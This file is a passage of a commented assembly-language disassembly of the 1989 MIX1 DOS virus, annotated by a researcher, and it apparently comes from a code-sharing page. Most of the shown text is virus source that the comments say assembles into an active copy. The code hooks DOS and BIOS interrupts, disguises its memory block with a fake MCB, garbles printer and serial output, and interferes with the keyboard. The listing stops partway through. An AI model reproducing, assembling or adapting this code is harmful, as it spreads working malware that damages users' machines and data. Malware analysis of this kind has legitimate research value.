📄 mix1.asm
字号:
; THE MIX1 virus
;
; It was first detected in Israel in August '89.
;
; Disassembly done Sept. 24-25 '89.
;
; The author of this program is unknown, but it is clearly a
; modification of the "Icelandic" virus, with considerable
; additions
;
; All comments in this file were added by Fridrik Skulason,
; University of Iceland/Computing Services.
;
; INTERNET: frisk@rhi.hi.is
; UUCP: ...mcvax!hafro!rhi!frisk
; BIX: FRISK
;
; To anyone who obtains this file - please be careful with it, I
; would not like to see this virus be distributed too much.
;
; A short description of the virus:
;
; It only infects .EXE files. Infected files grow by ... to ... bytes.
; The virus attaches itself to the end of the programs it infects.
;
; When an infected file is run, the virus copies itself to top of
; free memory, and modifies the memory blocks, in order to hide from
; memory mapping programs. Some programs may overwrite this area,
; causing the computer to crash.
;
; The virus will hook INT 21H and when function 4B (EXEC) is called
; it sometimes will infect the program being run. It will check every
; tenth program that is run for infection, and if it is not already
; infected, it will be.
;
; The virus will remove the Read-Only attribute before trying to
; infect programs.
;
; Infected files can be easily recognized, since they always end in
; "MIX1"
;
; To check for system infection, a byte at 0:33C is used - if it
; contains 77 the virus is installed in memory.
;
;
VIRSIZ EQU 128
;
; This is the original program, just used so this file, when
; assembled, will produce an active copy.
;
_TEXT1 SEGMENT PARA PUBLIC
_START DB 0b4H,09H
PUSH CS
POP DS
MOV DX,OFFSET STRING
INT 21H
MOV AX,4C00H
INT 21H
STRING DB "Hello world!",0dh,0ah,"$"
_TEXT1 ENDS
CODE SEGMENT PARA PUBLIC 'CODE'
ASSUME CS:CODE,DS:NOTHING,SS:NOTHING,ES:NOTHING
;
; The virus is basically divided in the following parts.
;
; 1. The main program - run when an infected program is run.
; It will check if the system is already infected, and if not
; it will install the virus.
;
; 2. The new INT 17 handler. All outgoing characters will be garbled.
;
; 3. The new INT 14 handler. All outgoing characters will be garbled.
;
; 4. The new INT 8 handler.
;
; 5. The new INT 9 handler. Disables the Num-Lock key
;
; 6. The new INT 21 handler. It will look for EXEC calls, and
; (sometimes) infect the program being run.
;
; Parts 1 and 6 are almost identical to the Icelandic-1 version
;
; This is a fake MCB
;
DB 'Z',00,00,VIRSIZ,0,0,0,0,0,0,0,0,0,0,0,0
VIRUS PROC FAR
;
; The virus starts by pushing the original start address on the stack,
; so it can transfer control there when finished.
;
ABRAX: DEC SP ; This used to be SUB SP,4
DEC SP
NOP
DEC SP
DEC SP
PUSH BP
MOV BP,SP
NOP ; added
PUSH AX
NOP ; added
MOV AX,ES
;
; Put the the original CS on the stack. The ADD AX,data instruction
; is modified by the virus when it infects other programs.
;
DB 05H
ORG_CS DW 0010H
MOV [BP+4],AX
;
; Put the the original IP on the stack. This MOV [BP+2],data instruction
; is modified by the virus when it infects other programs.
;
DB 0C7H,46H,02H
ORG_IP DW 0000H
;
; Save all registers that are modified.
;
PUSH ES
PUSH DS
PUSH BX
PUSH CX
PUSH SI
PUSH DI
;
; Check if already installed. Quit if so.
;
MOV AX,0 ; Was: XOR AX,AX
MOV ES,AX
CMP ES:[33CH],BYTE PTR 077H
JNE L1
;
; Restore all registers and return to the original program.
;
EXIT: POP DI
POP SI
POP CX
POP BX
POP DS
POP ES
POP AX
POP BP
RET
;
; The virus tries to hide from detection by modifying the memory block it
; uses, so it seems to be a block that belongs to the operating system.
;
; It looks rather weird, but it seems to work.
;
L1: MOV AH,52H
INT 21H
MOV AX,ES:[BX-2]
MOV ES,AX
PUSH ES ; Two totally unnecessary instructions
POP AX ; added
ADD AX,ES:[0003]
INC AX
INC AX
MOV CS:[0001],AX
;
; Next, the virus modifies the memory block of the infected program.
; It is made smaller, and no longer the last block.
;
MOV BX,DS
DEC BX
PUSH BX ; Unnecessary addition
POP AX
MOV DS,BX
MOV AL,'M'
MOV DS:[0000],AL
MOV AX,DS:[0003]
SUB AX,VIRSIZ
MOV DS:[0003],AX
ADD BX,AX
INC BX
;
; Then the virus moves itself to the new block.
;
PUSH BX ; Was: MOV ES,BX
POP ES
MOV SI,0 ; Was: XOR SI,SI XOR DI,DI
MOV DI,SI
PUSH CS
POP DS
MOV CX,652H
CLD
REP MOVSB
;
; The virus then transfers control to the new copy of itself.
;
PUSH ES
MOV AX,OFFSET L3
PUSH AX
RET
;
; Zero some variables
;
L3: MOV BYTE PTR CS:[MIN60],0
NOP
MOV BYTE PTR CS:[MIN50],0
NOP
MOV WORD PTR CS:[TIMER],0
;
; The most nutty way to zero ES register that I have ever seen:
;
MOV BX,0FFFFH
ADD BX,3F3FH
MOV CL,0AH
SHL BX,CL
AND BX,CS:[CONST0]
MOV AX,BX
MOV ES,AX
;
; Set flag to confirm installation
;
MOV BYTE PTR ES:[33CH],77H
;
; Hook interrupt 21:
;
MOV AX,ES:[0084H]
MOV CS:[OLD21],AX
MOV AX,ES:[0086H]
MOV CS:[OLD21+2],AX
MOV AX,CS
MOV ES:[0086H],AX
MOV AX,OFFSET NEW21
MOV ES:[0084H],AX
;
; Hook interrupt 17:
;
MOV AX,ES:[005CH]
MOV CS:[OLD17],AX
MOV AX,ES:[005EH]
MOV CS:[OLD17+2],AX
MOV AX,CS
MOV ES:[005EH],AX
MOV AX,OFFSET NEW17
MOV ES:[005CH],AX
;
; Hook interrupt 14:
;
MOV AX,ES:[0050H]
MOV CS:[OLD17],AX
MOV AX,ES:[0052H]
MOV CS:[OLD14+2],AX
MOV AX,CS
MOV ES:[0052H],AX
MOV AX,OFFSET NEW14
MOV ES:[0050H],AX
;
;
;
CMP WORD PTR CS:[NOINF],5
JG HOOK9
JMP EXIT
;
; Hook interrupt 9
;
HOOK9: MOV AX,ES:[0024H]
MOV CS:[OLD9],AX
MOV AX,ES:[0026H]
MOV CS:[OLD9+2],AX
MOV AX,CS
MOV ES:[0026H],AX
MOV AX,OFFSET NEW9
MOV ES:[0024H],AX
;
; Hook interrupt 8
;
MOV AX,ES:[0020H]
MOV CS:[OLD8],AX
MOV AX,ES:[0022H]
MOV CS:[OLD8+2],AX
MOV AX,CS
MOV ES:[0022H],AX
MOV AX,OFFSET NEW8
MOV ES:[0020H],AX
JMP EXIT
;
; Video processing
;
VID: PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH DI
PUSH DS
PUSH ES
PUSH CS
POP DS
MOV AH,0FH
INT 10H
MOV AH,6
MUL AH
MOV BX,AX
MOV AX,DS:[BX+OFFSET VIDEOT]
MOV CX,DS:[BX+OFFSET VIDEOT+2]
MOV DX,DS:[BX+OFFSET VIDEOT+4]
MOV ES,DX
SHR CX,1
MOV
DI,1
CMP AX,0
JNZ V1
V0: INC WORD PTR ES:[DI]
INC DI
INC DI
LOOP V0
JMP SHORT V2
NOP
V1: NOT WORD PTR ES:[DI]
INC DI
INC DI
LOOP V1
V2: POP ES
POP DS
POP DI
POP DX
POP CX
POP BX
POP AX
RET
;
; INT 9 replacement: Just fiddle around with the NUM-LOCK etc.
; This routine does not become active until 50 minutes after
; the execution of an infected program.
;
NEW9: PUSH AX
PUSH ES
CMP BYTE PTR CS:[MIN50],1
JNZ RETX1
XOR AX,AX
MOV ES,AX ; was xxxxxxxx
AND BYTE PTR ES:[417H],0BFH ; x0xxxxxx
OR BYTE PTR ES:[417H],20H ; x01xxxxx
TEST BYTE PTR ES:[417H],0CH
JZ RETX1
IN AL,60
CMP AL,53
JNZ RETX1
AND BYTE PTR ES:[417H],0F7H
;
; This seems to be an error - the virus uses a FAR call, which will
; probably cause the computer to crash.
;
DB 9AH
DW OFFSET VID,171CH
;
; This needs more checking.
;
RETX1: POP ES
POP AX
DB 0EAH
OLD9 DW 0,0
;
; New INT 14 routine - garble all outgoing characters
;
NEW14: CMP AH,1
JZ S1
DO14: DB 0EAH
OLD14 DW 0,0
S1: PUSH BX
XOR BX,BX
MOV BL,AL
ADD BX,OFFSET ERRTAB
MOV AL,CS:[BX] ; use old character as index into table
POP BX
JMP DO14
;
; New INT 8 routine
;
NEW8: PUSH DX
PUSH CX
PUSH BX
PUSH AX
CMP BYTE PTR CS:[MIN60],01 ; If counter >= 60 min.
JZ TT0 ; No need to check any more
INC WORD PTR CS:[TIMER] ; else increment timer
CMP WORD PTR CS:[TIMER],-10 ; 60 minutes ?
JZ TT1
CMP WORD PTR CS:[TIMER],54600 ; 50 minutes ?
JZ TT2
JMP TXEX
;
; 50 minutes after an infected program is run the flag is set.
;
TT2: MOV BYTE PTR CS:[MIN50],1
NOP
JMP TXEX
;
; 60 minutes after an infected program is run we start the ball bouncing.
;
TT1: MOV BYTE PTR CS:[MIN60],1
;
; Get current cursor position and save it
;
MOV AH,3
MOV BH,0
INT 10H
MOV CS:[SCRLINE],DH
MOV CS:[SCRCOL],DL
;
; Set cursor position
;
MOV AH,2
MOV BH,0
MOV DH,CS:[MYLINE]
MOV DL,CS:[MYCOL]
INT 10H
;
; Check what is there and store it
;
MOV AH,8
MOV BH,0
INT 10H
MOV CS:[ONSCREEN],AL
;
; Set cursor position back as it was before
;
MOV AH,2
MOV BH,0
MOV DH,CS:[SCRLINE]
MOV DL,CS:[SCRCOL]
INT 10H
;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -